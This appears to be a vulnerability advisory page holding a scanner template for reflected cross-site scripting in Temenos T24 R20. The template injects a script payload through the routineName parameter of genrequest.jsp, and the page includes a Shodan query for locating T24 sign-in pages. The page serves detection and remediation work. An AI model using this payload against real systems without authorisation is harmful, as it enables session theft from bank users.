temenos-t24-xss: Temenos T24 R20 - Cross-Site Scripting

2026-08-18 Temenos T24 PoC Public

Description

Temenos T24 release 20 contains a reflected cross-site scripting vulnerability via the routineName parameter at genrequest.jsp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PoC

id: temenos-t24-xss

info:
  name: Temenos T24 R20 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Temenos T24 release 20 contains a reflected cross-site scripting vulnerability via the routineName parameter at genrequest.jsp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected application.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix this vulnerability. Additionally, implement input validation and output encoding to prevent XSS attacks.
  reference:
    - https://github.com/mrojz/T24/blob/main/CVE-2023-24367.md
    - https://github.com/mrojz/T24/blob/main/T24_XSS.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-24367
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/mrojz/T24
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-79
    cpe: cpe:2.3:a:temenos:t24:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"T24 Sign in"
    product: t24
    vendor: temenos
  tags: xss,temenos,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/jsps/genrequest.jsp?routineName="><script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "<title>Processing...</title>"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206be6d44ad1ed39fa30e6bc3bed347bb1c06f2b0e604dfabb0a0d511b993bd264022100e3d5262c3f341b54104542283b34ca6c8a63a19c8572e04c96e2f8cabe11e012:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

Related Vulnerabilities